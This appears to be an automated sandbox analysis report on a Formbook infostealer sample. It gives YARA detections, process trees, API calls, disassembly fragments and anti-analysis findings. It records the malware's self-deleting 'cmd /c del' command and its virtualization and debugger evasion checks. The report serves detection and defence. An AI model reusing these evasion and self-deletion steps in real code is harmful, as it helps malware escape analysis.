Source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/3@15/12

Source: C:\Users\user\Desktop\eQLPRPErea.exe

Code function: 1_2_00404201 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

1_2_00404201

Source: C:\Users\user\Desktop\eQLPRPErea.exe

Code function: 1_2_004020A6 CoCreateInstance,MultiByteToWideChar,

1_2_004020A6

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_01

Source: C:\Users\user\Desktop\eQLPRPErea.exe

File created: C:\Users\user\AppData\Local\Temp\nsq6028.tmp

Jump to behavior

Source: eQLPRPErea.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\eQLPRPErea.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\eQLPRPErea.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: eQLPRPErea.exe	Virustotal: Detection: 28%
Source: eQLPRPErea.exe	ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\eQLPRPErea.exe

File read: C:\Users\user\Desktop\eQLPRPErea.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\eQLPRPErea.exe 'C:\Users\user\Desktop\eQLPRPErea.exe'
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Process created: C:\Users\user\Desktop\eQLPRPErea.exe 'C:\Users\user\Desktop\eQLPRPErea.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\eQLPRPErea.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Process created: C:\Users\user\Desktop\eQLPRPErea.exe 'C:\Users\user\Desktop\eQLPRPErea.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\eQLPRPErea.exe'	Jump to behavior

Source: C:\Users\user\Desktop\eQLPRPErea.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000002.964029723.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: eQLPRPErea.exe, 00000001.00000003.692305861.000000001ECE0000.00000004.00000001.sdmp, eQLPRPErea.exe, 00000003.00000002.736314312.0000000000B5F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: eQLPRPErea.exe, wlanext.exe
Source:	Binary string: wlanext.pdb source: eQLPRPErea.exe, 00000003.00000002.736943919.00000000026B0000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdbGCTL source: eQLPRPErea.exe, 00000003.00000002.736943919.00000000026B0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000005.00000002.964029723.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\eQLPRPErea.exe

Unpacked PE file: 3.2.eQLPRPErea.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;

Source: C:\Users\user\Desktop\eQLPRPErea.exe

Code function: 1_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,

1_2_00401FDC

Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00416090 push edi; ret	3_2_004160A1
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00407101 push cs; iretd	3_2_0040710A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00416104 push ds; retf	3_2_00416105
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_0041CA5A pushfd ; retf	3_2_0041CA5B
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_004162ED push es; iretd	3_2_004162EF
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_0041B3C5 push eax; ret	3_2_0041B418
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_0041B47C push eax; ret	3_2_0041B482
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_0041B412 push eax; ret	3_2_0041B418
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_0041B41B push eax; ret	3_2_0041B482
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00415EC4 push edx; ret	3_2_00415EC5
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00415FA8 push esp; iretd	3_2_00415FA9
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00ABD0D1 push ecx; ret	3_2_00ABD0E4
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_00416090 push edi; ret	3_1_004160A1
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_00407101 push cs; iretd	3_1_0040710A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_00416104 push ds; retf	3_1_00416105
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_0041CA5A pushfd ; retf	3_1_0041CA5B
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_004162ED push es; iretd	3_1_004162EF
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_1_0041B3C5 push eax; ret	3_1_0041B418
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030DD0D1 push ecx; ret	9_2_030DD0E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00866090 push edi; ret	9_2_008660A1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00866104 push ds; retf	9_2_00866105
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00857101 push cs; iretd	9_2_0085710A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_008662ED push es; iretd	9_2_008662EF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0086CA5A pushfd ; retf	9_2_0086CA5B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0086B3C5 push eax; ret	9_2_0086B418
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0086B412 push eax; ret	9_2_0086B418
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0086B41B push eax; ret	9_2_0086B482
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0086B47C push eax; ret	9_2_0086B482
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00865EC4 push edx; ret	9_2_00865EC5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00865FA8 push esp; iretd	9_2_00865FA9

Source: C:\Users\user\Desktop\eQLPRPErea.exe

File created: C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll

Jump to dropped file

Source: C:\Users\user\Desktop\eQLPRPErea.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\eQLPRPErea.exe	RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\eQLPRPErea.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 00000000008585F4 second address: 00000000008585FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 000000000085898E second address: 0000000000858994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\eQLPRPErea.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\eQLPRPErea.exe

Code function: 3_2_004088C0 rdtsc

3_2_004088C0

Source: C:\Windows\explorer.exe TID: 5480	Thread sleep time: -70000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 6908	Thread sleep time: -48000s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 1_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	1_2_0040531D
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 1_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	1_2_00405CB0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 1_2_004026BC FindFirstFileA,	1_2_004026BC

Source: explorer.exe, 00000005.00000000.709265764.0000000004710000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.716490018.000000000A9A6000.00000004.00000001.sdmp	Binary or memory string: 00#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&g
Source: explorer.exe, 00000005.00000000.712230264.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.715679720.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.712630114.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.715679720.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000002.961888958.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000005.00000000.712230264.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.715995251.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000000.712230264.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000005.00000000.716085143.000000000A784000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000005.00000000.712230264.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\eQLPRPErea.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\eQLPRPErea.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\eQLPRPErea.exe

Code function: 3_2_004088C0 rdtsc

3_2_004088C0

Source: C:\Users\user\Desktop\eQLPRPErea.exe

Code function: 3_2_00409B30 LdrLoadDll,

3_2_00409B30

Source: C:\Users\user\Desktop\eQLPRPErea.exe

Code function: 1_2_6FC61000 YVfgfgfgfgfg,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,

1_2_6FC61000

Source: C:\Users\user\Desktop\eQLPRPErea.exe

Code function: 1_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,

1_2_00401FDC

Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 1_2_0291187F mov eax, dword ptr fs:[00000030h]	1_2_0291187F
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 1_2_02911667 mov eax, dword ptr fs:[00000030h]	1_2_02911667
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA90AF mov eax, dword ptr fs:[00000030h]	3_2_00AA90AF
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]	3_2_00A920A0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]	3_2_00A920A0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]	3_2_00A920A0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]	3_2_00A920A0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]	3_2_00A920A0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]	3_2_00A920A0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9F0BF mov ecx, dword ptr fs:[00000030h]	3_2_00A9F0BF
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9F0BF mov eax, dword ptr fs:[00000030h]	3_2_00A9F0BF
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9F0BF mov eax, dword ptr fs:[00000030h]	3_2_00A9F0BF
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A69080 mov eax, dword ptr fs:[00000030h]	3_2_00A69080
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE3884 mov eax, dword ptr fs:[00000030h]	3_2_00AE3884
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE3884 mov eax, dword ptr fs:[00000030h]	3_2_00AE3884
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A658EC mov eax, dword ptr fs:[00000030h]	3_2_00A658EC
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]	3_2_00AFB8D0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AFB8D0 mov ecx, dword ptr fs:[00000030h]	3_2_00AFB8D0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]	3_2_00AFB8D0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]	3_2_00AFB8D0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]	3_2_00AFB8D0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]	3_2_00AFB8D0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]	3_2_00A9002D
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]	3_2_00A9002D
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]	3_2_00A9002D
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]	3_2_00A9002D
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]	3_2_00A9002D
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A7B02A mov eax, dword ptr fs:[00000030h]	3_2_00A7B02A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A7B02A mov eax, dword ptr fs:[00000030h]	3_2_00A7B02A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A7B02A mov eax, dword ptr fs:[00000030h]	3_2_00A7B02A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A7B02A mov eax, dword ptr fs:[00000030h]	3_2_00A7B02A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B34015 mov eax, dword ptr fs:[00000030h]	3_2_00B34015
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B34015 mov eax, dword ptr fs:[00000030h]	3_2_00B34015
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE7016 mov eax, dword ptr fs:[00000030h]	3_2_00AE7016
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE7016 mov eax, dword ptr fs:[00000030h]	3_2_00AE7016
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE7016 mov eax, dword ptr fs:[00000030h]	3_2_00AE7016
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B22073 mov eax, dword ptr fs:[00000030h]	3_2_00B22073
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B31074 mov eax, dword ptr fs:[00000030h]	3_2_00B31074
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A80050 mov eax, dword ptr fs:[00000030h]	3_2_00A80050
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A80050 mov eax, dword ptr fs:[00000030h]	3_2_00A80050
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE69A6 mov eax, dword ptr fs:[00000030h]	3_2_00AE69A6
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A961A0 mov eax, dword ptr fs:[00000030h]	3_2_00A961A0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A961A0 mov eax, dword ptr fs:[00000030h]	3_2_00A961A0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE51BE mov eax, dword ptr fs:[00000030h]	3_2_00AE51BE
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE51BE mov eax, dword ptr fs:[00000030h]	3_2_00AE51BE
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE51BE mov eax, dword ptr fs:[00000030h]	3_2_00AE51BE
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE51BE mov eax, dword ptr fs:[00000030h]	3_2_00AE51BE
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A8C182 mov eax, dword ptr fs:[00000030h]	3_2_00A8C182
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9A185 mov eax, dword ptr fs:[00000030h]	3_2_00A9A185
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A92990 mov eax, dword ptr fs:[00000030h]	3_2_00A92990
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]	3_2_00A6B1E1
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]	3_2_00A6B1E1
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]	3_2_00A6B1E1
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AF41E8 mov eax, dword ptr fs:[00000030h]	3_2_00AF41E8
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A84120 mov eax, dword ptr fs:[00000030h]	3_2_00A84120
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A84120 mov eax, dword ptr fs:[00000030h]	3_2_00A84120
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A84120 mov eax, dword ptr fs:[00000030h]	3_2_00A84120
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A84120 mov eax, dword ptr fs:[00000030h]	3_2_00A84120
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A84120 mov ecx, dword ptr fs:[00000030h]	3_2_00A84120
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9513A mov eax, dword ptr fs:[00000030h]	3_2_00A9513A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9513A mov eax, dword ptr fs:[00000030h]	3_2_00A9513A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A69100 mov eax, dword ptr fs:[00000030h]	3_2_00A69100
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A69100 mov eax, dword ptr fs:[00000030h]	3_2_00A69100
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A69100 mov eax, dword ptr fs:[00000030h]	3_2_00A69100
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A6C962 mov eax, dword ptr fs:[00000030h]	3_2_00A6C962
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A6B171 mov eax, dword ptr fs:[00000030h]	3_2_00A6B171
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A6B171 mov eax, dword ptr fs:[00000030h]	3_2_00A6B171
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A8B944 mov eax, dword ptr fs:[00000030h]	3_2_00A8B944
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A8B944 mov eax, dword ptr fs:[00000030h]	3_2_00A8B944
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]	3_2_00A652A5
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]	3_2_00A652A5
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]	3_2_00A652A5
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]	3_2_00A652A5
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]	3_2_00A652A5
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]	3_2_00A7AAB0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]	3_2_00A7AAB0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9FAB0 mov eax, dword ptr fs:[00000030h]	3_2_00A9FAB0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9D294 mov eax, dword ptr fs:[00000030h]	3_2_00A9D294
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9D294 mov eax, dword ptr fs:[00000030h]	3_2_00A9D294
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A92AE4 mov eax, dword ptr fs:[00000030h]	3_2_00A92AE4
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A92ACB mov eax, dword ptr fs:[00000030h]	3_2_00A92ACB
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA4A2C mov eax, dword ptr fs:[00000030h]	3_2_00AA4A2C
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA4A2C mov eax, dword ptr fs:[00000030h]	3_2_00AA4A2C
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A78A0A mov eax, dword ptr fs:[00000030h]	3_2_00A78A0A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A6AA16 mov eax, dword ptr fs:[00000030h]	3_2_00A6AA16
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A6AA16 mov eax, dword ptr fs:[00000030h]	3_2_00A6AA16
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A83A1C mov eax, dword ptr fs:[00000030h]	3_2_00A83A1C
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A65210 mov eax, dword ptr fs:[00000030h]	3_2_00A65210
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A65210 mov ecx, dword ptr fs:[00000030h]	3_2_00A65210
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A65210 mov eax, dword ptr fs:[00000030h]	3_2_00A65210
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A65210 mov eax, dword ptr fs:[00000030h]	3_2_00A65210
